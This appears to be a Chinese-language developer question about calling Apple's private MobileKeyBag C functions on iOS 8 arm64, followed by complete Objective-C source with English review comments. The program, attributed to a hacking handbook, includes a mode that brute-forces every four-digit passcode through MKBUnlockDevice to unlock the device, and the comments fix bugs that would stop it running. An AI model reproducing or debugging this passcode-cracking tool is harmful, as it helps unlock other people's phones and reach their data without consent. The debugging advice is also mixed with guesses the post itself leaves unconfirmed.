需要的是 iOS 8 arm64 上的
/System/Library/PrivateFrameworks/MobileKeyBag.framework/MobileKeyBag 库。
它导出的是 C 函数而不是 Objective-C 类，所以 class-dump 看不到任何东西；我不知道该怎么加载并调用这种 C 接口的私有库。
1. 静态链接时：用 jtool 导出 MobileKeyBag，加入 Xcode 工程后能编译成功！
有些函数导出后执行正常，但 MKBGetDeviceLockState 一执行就报错：
Segmentation fault: 11
Google 到的说法都是内存申请之类的问题，可是代码看不出哪里有错——用的就是《iOS Hacker's Handbook》书上的代码。（注：在 arm64 上，如果真实的导出函数需要参数而 extern 声明里把参数省略了，调用时 x0 里残留的值会被当作参数去解引用，同样会表现为 SIGSEGV；可以先反汇编该导出函数确认原型。）
2. 动态加载时就完全不行了：
#define PRIVATE_PATH "/bin/MobileKeyBag.dylib"（用 jtool 从 dyld shared cache 导出后改名为 .dylib）
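void *kit = dlopen(PRIVATE_PATH, RTLD_LAZY);
if (kit == NULL) {
    // Without this check every dlsym() below silently yields NULL, which is
    // exactly what "three zeros" in the output looks like.
    const char *err = dlerror();
    fprintf(stderr, "dlopen(%s) failed: %s\n", PRIVATE_PATH, err ? err : "unknown error");
} else {
    // Print the addresses with %p: %d only shows the truncated low 32 bits of a
    // 64-bit pointer and cannot distinguish a NULL result from a real address.
    int (*MKBGetDeviceLockState)() = dlsym(kit, "MKBGetDeviceLockState");
    printf("MKBGetDeviceLockState = %p\n", (void *)MKBGetDeviceLockState);
    int (*MKBDeviceUnlockedSinceBoot)() = dlsym(kit, "MKBDeviceUnlockedSinceBoot");
    printf("MKBDeviceUnlockedSinceBoot = %p\n", (void *)MKBDeviceUnlockedSinceBoot);
    int (*MKBUnlockDevice)() = dlsym(kit, "MKBUnlockDevice");
    printf("MKBUnlockDevice = %p\n", (void *)MKBUnlockDevice);
    // dlclose() must stay after the last use of the pointers obtained above;
    // calling through them once the image is closed is undefined.
    dlclose(kit);
}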
动态加载运行后不再崩溃（这段代码只打印了指针，并没有真正调用这些函数），但三个 dlsym 的结果都打印成 0。三个值全是 0 说明 dlsym 返回的是 NULL——用 %d 打印 64 位指针只会显示截断后的低 32 位，真实的代码地址不会恰好是 0——所以应先检查 dlopen 的返回值并打印 dlerror()；另外 jtool 抽出来的文件通常不能直接被 dlopen，应该传框架的原始路径 /System/Library/PrivateFrameworks/MobileKeyBag.framework/MobileKeyBag，让 dyld 从 shared cache 里解析：
MKBGetDeviceLockState = 0
MKBDeviceUnlockedSinceBoot = 0
MKBUnlockDevice = 0
完整代码:
```
#include <dlfcn.h>
#import <stdio.h>
#import <stdlib.h>
#include <string.h>
#import <unistd.h>
#import <Foundation/Foundation.h>
// Prototypes for the MobileKeyBag exports; no public SDK header declares them.
// They are copied from the iOS Hacker's Handbook listing and, per the post,
// resolved at link time against the framework extracted with jtool.
extern int MKBUnlockDevice(NSData* passcode, int flags);
// NOTE(review): the SIGSEGV reported inside this call is consistent with a
// prototype mismatch. With an empty parameter list the compiler sets up no
// argument registers, so if the real export expects an options argument it
// dereferences whatever x0 happens to hold. Confirm the signature by
// disassembling the export before relying on this declaration.
extern int MKBGetDeviceLockState();
extern int MKBDeviceUnlockedSinceBoot();
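/// Prints the command-line synopsis and terminates the process with EXIT_FAILURE.
/// @param argv0 The program name as invoked (argv[0]).
void usage(char* argv0)
{
    // The original text had an unbalanced "]"; -B and -p are alternatives and
    // both are optional (no option means "just show state").
    printf("usage: %s [ -B | -p <passcode> ]\n", argv0);
    exit(EXIT_FAILURE);
}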
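/// Attempts to unlock the device with a single passcode.
/// @param passcode NUL-terminated UTF-8 passcode. NULL or non-UTF-8 input is
///                 rejected without calling into MobileKeyBag.
/// @return MKBUnlockDevice's result (the caller treats 0 as success), or -1
///         when the passcode could not be converted.
int try_unlock(const char* passcode)
{
    if (passcode == NULL) {
        return -1;
    }
    // The original had unbalanced brackets here and used the deprecated
    // initWithCString:, whose encoding is platform-defined; be explicit.
    NSString* nssPasscode = [[NSString alloc] initWithCString:passcode
                                                      encoding:NSUTF8StringEncoding];
    if (nssPasscode == nil) {
        // initWithCString:encoding: returns nil for bytes that are not valid UTF-8.
        return -1;
    }
    NSData* nsdPasscode = [nssPasscode dataUsingEncoding:NSUTF8StringEncoding];
    return MKBUnlockDevice(nsdPasscode, 0);
}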
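/// Tries one passcode and prints the unlock result followed by the lock state
/// reported afterwards.
/// @param passcode NUL-terminated UTF-8 passcode handed to try_unlock.
void try_passcode(const char* passcode)
{
    // Reuse try_unlock instead of duplicating the string -> NSData conversion
    // (the duplicated copy also carried the same unbalanced-bracket bug).
    int ret = try_unlock(passcode);
    printf("MKBUnlockDevice returned %d\n", ret);
    ret = MKBGetDeviceLockState();
    printf("MKBGetDeviceLockState returned %d\n", ret);
}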
/// Prints the two MobileKeyBag state queries, one per line, in this order:
/// MKBDeviceUnlockedSinceBoot first, then MKBGetDeviceLockState.
void get_state()
{
    int unlockedSinceBoot = MKBDeviceUnlockedSinceBoot();
    printf("MKBDeviceUnlockedSinceBoot returned %d\n", unlockedSinceBoot);

    int lockState = MKBGetDeviceLockState();
    printf("MKBGetDeviceLockState returned %d\n", lockState);
}
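// Load MobileKeyBag through its real install path: dyld resolves that name from
// the dyld shared cache. A copy extracted with jtool and renamed .dylib is not a
// linkable image and dlopen() on it is expected to fail; the original code never
// checked for that, which is why all three dlsym() results printed as 0.
#define PRIVATE_PATH "/System/Library/PrivateFrameworks/MobileKeyBag.framework/MobileKeyBag"

/// Diagnostic only: resolves the three MobileKeyBag exports via dlopen()/dlsym()
/// and prints their addresses (with %p; %d would truncate a 64-bit pointer).
/// The real calls elsewhere in this file go through the extern prototypes.
static void probe_mobilekeybag(void)
{
    void *kit = dlopen(PRIVATE_PATH, RTLD_LAZY);
    if (kit == NULL) {
        const char *err = dlerror();
        fprintf(stderr, "dlopen(%s) failed: %s\n", PRIVATE_PATH, err ? err : "unknown error");
        return;
    }
    static const char *const names[] = {
        "MKBGetDeviceLockState",
        "MKBDeviceUnlockedSinceBoot",
        "MKBUnlockDevice",
    };
    for (size_t i = 0; i < sizeof(names) / sizeof(names[0]); i++) {
        void *sym = dlsym(kit, names[i]);
        if (sym == NULL) {
            const char *err = dlerror();
            fprintf(stderr, "dlsym(%s) failed: %s\n", names[i], err ? err : "unknown error");
        } else {
            printf("%s = %p\n", names[i], sym);
        }
    }
    // Nothing obtained from dlsym() is used after this point, so closing is safe.
    dlclose(kit);
}

/// Entry point. With no options prints the lock state; -p <passcode> tries one
/// passcode; -B brute-forces every 4-digit numeric passcode.
int main(int argc, char *argv[])
{
    @autoreleasepool {
        int mode = 0;               // 0 = show state, 1 = try one passcode, 2 = brute force
        char passcode[64] = { 0 };  // bounded copy of -p's argument, NUL-terminated
        int opt;

        probe_mobilekeybag();

        // Loop until getopt() returns -1. The original made a single call and sent
        // -1 to the default branch, so "no options" exited via usage() and mode 0
        // ("just show state") was unreachable.
        while ((opt = getopt(argc, argv, "p:B")) != -1) {
            switch (opt) {
            case 'p': // Try given passcode
                mode = 1;
                // Bounded copy: the original strcpy()'d an arbitrary-length optarg
                // into a 5-byte stack buffer (overflow for anything longer than 4
                // characters) and leaked the strdup() it copied from.
                if (strlen(optarg) >= sizeof(passcode)) {
                    fprintf(stderr, "passcode must be at most %zu characters\n",
                            sizeof(passcode) - 1);
                    return EXIT_FAILURE;
                }
                snprintf(passcode, sizeof(passcode), "%s", optarg);
                printf("passcode = %s\n", passcode);
                break;
            case 'B': // brute force mode
                mode = 2;
                break;
            default:
                usage(argv[0]);
            }
        }

        switch (mode) {
        case 0: // Just show state
            printf("Just show state\n");
            get_state();
            break;
        case 1: // Try a given passcode
            printf("Try a given passcode\n");
            get_state();
            try_passcode(passcode);
            get_state();
            break;
        case 2: // Brute force numeric passcode
            printf("Brute force numeric passcode\n");
            get_state();
            // CAUTION: this submits up to 10,000 wrong passcodes. Whether failed
            // MKBUnlockDevice() attempts count toward the device's failed-attempt
            // backoff or "erase data" policy is not established here; confirm on a
            // device you can afford to wipe before running it anywhere else.
            for (int i = 0; i < 10000; i++) {
                @autoreleasepool {  // drain the per-attempt NSString/NSData temporaries
                    char pc[5];
                    snprintf(pc, sizeof(pc), "%.4d", i);
                    printf("%s", pc);
                    fflush(stdout);  // progress is otherwise buffered until exit
                    if (try_unlock(pc) == 0) {
                        printf("Success! PINCODE %s\n", pc);
                        break;
                    }
                }
            }
            break;
        }
    }
    return 0;
}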
```